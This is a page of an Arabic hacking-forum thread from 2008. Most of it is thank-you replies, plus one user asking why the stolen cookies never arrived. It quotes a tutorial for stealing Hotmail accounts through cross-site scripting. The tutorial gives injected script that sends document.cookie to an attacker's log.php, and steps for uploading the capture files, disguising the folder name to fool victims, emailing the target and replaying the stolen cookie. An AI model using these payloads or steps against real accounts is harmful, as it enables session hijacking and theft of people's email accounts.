قنبله المنتديات العربيه ثغره الـXss HotMaiL حصريا على مياسه شرح بالصور - الصفحة 16

25-Mar-2008, 04:41 AM

شووووووووووكرا

01-Apr-2008, 08:50 PM

qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq

13-Apr-2008, 04:16 AM

مشكووووور آخوي صخر ,,

21-Apr-2008, 02:03 AM

wow thak you yaaaaaaaaaaaaaaaaaaaa man

21-Apr-2008, 08:59 PM

thanksssssssssssssssss

22-Apr-2008, 09:43 PM

السلام عليك

انا طبقت كل شي قلتو عن ثغرة الxss بالهوتميل طبقت كل شي بالحرف والتزمت بكلامك 100% واستبدلت موقعي بدل الموقع المفروض xxxxx
بس لم يظهر عندي المجلد majed يعني لم يصلني الكوكيز ف شو السبب؟؟؟؟؟؟؟؟ يعني ممكن تكون شركة الهوتميل سكرت هذي الثغرة
ياريت تساعدني ارجوك وبسرعة
انا عم استنى من رد

مع السلامة

24-Apr-2008, 10:44 AM

كويتي^صخر = ابداع وتميز
مشكور على تعبك معانا

25-Apr-2008, 07:32 AM

Thaaaaaaaaaaanx

25-Apr-2008, 05:39 PM

Saluuuu 2 Mecri Bcpppppp

29-Apr-2008, 08:05 PM

merciiiiiiiiii

09-May-2008, 02:30 AM

شكرا جدا ويا رب ينفع

18-May-2008, 06:17 PM

thxxxxxxxxxxxxx

20-May-2008, 11:14 PM

مشكككككوووووووووووووووووووووررررررررررررررررررررر

20-May-2008, 11:18 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة كويتي^صخر


	بسم الله الرحمن الرحيم السلام عليكم ورحمه الله وبركاته ملاحظه هامه الشرح محفوظ لمنتديات مياسه وكويتي^صخر ولحد يجي وينقله ويقول ان من العضو نفسه كاتبه علشان افيدكم زياده لازم تذكرون الحقوق.... وارجوا من الادارة حفظ الحقوق لان هالشرح والثغره العالم كلها مصابين فيها تقريبا انا وانت والكل... رجاء خاص لحد يستخدمها ضد اخوانه العرب والمسلمين وانا ادري اغلبكم يخترق ربعه بس رجاء خاص اخواني... بسم الله نبدأ الشرح:- طبعا ثغره الهوتميل اقوى ثغره التي هزت شركه الـ MSN وقللت من حمايتها وانسرقت اغلب اميلات الشباب الموجوده بالنت واول ثغره نزلت عام 2005 ... الي يجي ويقول عارفها من زمان اقوله الثغره كانت برايفت بس انتشرت وهالثغره الي بشرحها كانت برايفت بس انشرحت وهذي انا شرحتها مره ثانيه بمنتديات مياسه اول شئ بعطيكم معلومه عن ثغرات الــ Xss طبعا الـ Xss او الCross Site Scripting ثغرات حلوه جدا وهي لها صله بالــ C o o k i e s ومن خلال هذا الـ C o o k i e s تقدر انك تستفيد من معلومات الكوكيز نفسه واحد يجي يسألني طيب يا كويتي صخر كيف نستفيد؟ انا اقولك كيف تستفيد.... ^^ طبعا الكوكيز موجود بكل جهاز وبكل منتدى تسجل فيه الكوكيز يجيك تلقائي بجهازك علشان اذا دشيت المنتدى مره ثانيه يتسجل تلقائي تلقى نفسك متسجل خالص بس تدش تشارك ليش يصير هالشئ؟ لان الكوكيز دش جهازك وانحفظ وطبعا مو خطر ان يدش جهازك وله فايده على المنتدى نفسه ان يحصد اكثر عدد من الاجهزه انا شرحت من كم فتره ثغره الفلاش تبع منتديات الـ vBulletin ان يوصلك الكوكيز على اميلك ومن ثم تاخذ برنامج كوكيز اديتور وتغير الـ LastVisit و Userid و Password وتسوي حفظ وتدش المنتدى بأسم الادمن هذي الثغره تسمى Xss ليش؟ لان يوصلك الكوكيز واي ثغره تتعلق بالكوكيز اسمها Xss الحين احنا عرفنا نبذه عن ثغره الـ Xss طيب كيف مثلا يا كويتي صخر اعطيني شرح مبسط لثغرة xss .. ؟ مثلا عندنا ثغرة xss بمنتدى Invision Power Board مثلا [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] الحين الxss بالمنتدى http://xxx.com/forums/index.php?act=idx='>xss الحين بمكان كلمه xss نضيف كود خبيث يعرض لنا الكوكيز و هو <Script>javascript:alert(document.**** )</Script> يصير كالتالي : http://xxx.com/forums/index.php?act=idx=<Script>javascript:alert(documen t.co o k ie )</Script> الأن بعد ما نكتب الرابط بالمتصفح راح تظهر لنا نافذة Microsoft Internet Exploler و داخلها معلومات الكوكيز بجهازك تبع المنتدى .. طيب جميل جدا الأن كل شئ .. لكن لسة ما وصلنا كيف راح يسرق الهكر الكوكيز من جهازي الحين انا الى دخلت على الرابط و ظهر لي الكوكيز في جهازي ما ظهرت للهكر !!.. فعلا الكوكيز ظهر على جهازك!! مثلا الهكر يبي يشوف هالكوكيز عنده شنو يسوي؟ راح يستخدم شئ اسمه الـLog و يربطه مع الثغرة .. ايش هو الLog ؟ الوج هذا عبارة عن ملف مكتوب بلغة الphp يقوم بتسجيل الكوكيز الى توصله في ملف txt او يرسلها على الأيميل.. الحين لما يجي الهكر يربط الثغرة بملف الوج و انت تدخل على الرابط اول لما تدخل على الرابط راح ترسل الكوكيز لملف الlog و يحصل عليها الهكر .. ( مثل ما شرحت بثغره الفلاش ) نشوف مثال لربط ملف الوج بالثغرة .. راح نستبدل الكود الخبيث <Script>javascript:alert(document.** )</Script> و الرابط يكون : http://xxx.com/forums/index.php?act=idx=<Script>location.href="http://www.xxx.com/log.php?id="+escape(document.**</Script> http://www.xxx.com/log.php = رابط ملف الوج الى راح يرسل له الكوكيز طيب الحين نفرض الهكريبي يسرق الكوكيز من جهازك راح يرسلك هذا الرابط اول لما تدخل عليه راح ترسل الكوكيز إلي راح يسجلها في ملف txt على الموقع او يرسلها علطول على الأيميل .. الحين جذي عرفنا تطبيق بسيط لثغرة xss و اصبح لدينا خلفية عنها و فهمنا كيف تتم .. --------------------------- الحين بعد هالمقدمه الطويله ندش بصلب الموضوع يوجد بالهوتميل ثغره خطيره جدا جدا من نوع Xss التي تؤدي الى سرقه الاميل بالكوكيز بدون برامج.... بالبداية انا راح اشرح الثغرة ليس لهدف استغلالها و السرقه بها و لكن لعرض مدى خطورتها على كل واحد و كمان نرى هذي الأيام انتشار عمليات سرقه ايميلات ناس كثير بدون استقابل اي برامج او باتشات و و اللًة انا برئ تماما ممن يستخدم الثغرة على المسـلمينء في سرقه ايميلاتهم و اللًة على ما اقول شهيد .. .::: بسم اللًة نبداء الشرح ::.. بالنسبه لتطبيق الثغره راح نحتاج 4 ملفات... 1- ملف الــ Log.php 2- ملف js 3- ملف الــ index.htm 4: كود استغلال الثغرة .. ِشوف الصوره:- الحين راح يتم التعديل على الملفات بالبدايه نفتح ملف الــ index.php بمفكره شوف الصوره:- ونعدل على الي داخله شوف الصوره وياي :- بدال الـ xxx حط اسم موقعك علشان يكون التعديل على موقعك والحين نفتح ملف الــ js ونعدل عليه كما في الصوره الحين:- والحين نفتح الــ FTP على موقعك وتنقل الملفات عليها وتنقل ملفات الثغره كامله كما هو مشورح بالصوره واحسن شئ انك ترفعه مع المجلد كامل وتسميه اي شئ وتمويه للضحيه سميه مثل اسم المنتدى يعني مثال :- vb علشان ما يشك الضحيه ويقول ان الرابط صحيح لمنتدى فاهمين علي؟ وبعدين نعطي المجلد الي فيه الثغره تصريح رقم 777 وطريقه اعطاء التصاريح بالصوره شوف:- وبعدين ترسل رساله من اميلك على اميل الي تبي تسرقه في وقت دخول الي دزيتله رساله راح يشيك على الرسايل ويشوف الرساله مالتك يفتحها اول ما يفتحها راح تشوف مجلد الثغره زاد ملف ثاني اسمه majed.htm هذا المجلد اهو الي فيه الكوكيز يعني يصير الرابط مال الملف الي فيه الكوكيز بالطريقه هذي [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]** حيث ان xxx هو اسم الموقع تبعك وراح تشوف الكوكيز كما في الصوره التاليه:- انسخ الكوكيز كاااامل وتأكد ان الكوكيز كامل وبعدين افتح برنامج اسمه Proxomitron وهذي ايقونته:- تفتحه البرنامج وتروح على قائمه الهيدر شوف الصوره وياي:- وبعدين راح نضغط على قائمه نيو شوف الصوره:-


قريبا	قريبا	قريبا	قريبا